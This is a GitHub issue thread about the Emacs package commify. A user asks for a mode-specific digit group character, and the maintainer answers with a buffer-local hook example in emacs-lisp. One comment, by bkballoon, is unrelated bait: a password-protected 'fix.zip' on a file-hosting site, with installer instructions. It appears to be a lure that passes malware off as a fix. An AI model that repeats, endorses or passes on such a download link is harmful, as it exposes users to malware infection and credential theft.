### ISSUE TITLE
Mode specific commify-group-char

### ISSUE THREAD

**Issue by mandarm** [ddoherty03/commify#7]
Would it be possible to make commify-group-char mode-specific? In particular, I was hoping to use ' for big numbers in C programs, since modern standard Cs allow this.

One quick way to implement this might be to let commify-group-char be either a string/character or an alist. Depending on what it is, we define ```--commify-group-char``` (an "internal" variable) to be the character for the current major mode, or the default (e.g., ","). The rest of the existing code would also have to be modified to use ```--commify-group-char``` wherever it currently uses ```commify-group-char```.

I know enough emacs-lisp to tinker around with my init file, but am not confident enough to send a PR, hence this request. Do let me know if you'd like me to take a shot at it. Thanks!

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ddoherty03** [comment]
@mandarm, thanks for your interest in commify.  Since the main variables for commify are buffer-local, you should be able to accomplish what you want by just setting the variables in the appropriate hook.  Here is what I use for ruby-mode:

```
#+begin_src emacs-lisp
  (use-package commify
    :chords ((",," . commify-toggle)))
#+end_src

#+begin_src emacs-lisp
  (defun ded:set-ruby-commify ()
    (setq commify-group-char "_")
    (setq commify-group-size 4))
  (add-hook 'ruby-base-mode-hook #'ded:set-ruby-commify)
#+end_src
```
Let me know if that helps.

**Comment by mandarm** [comment]
Perfect! I've made the changes in my init.el, so closing this. Many thanks!
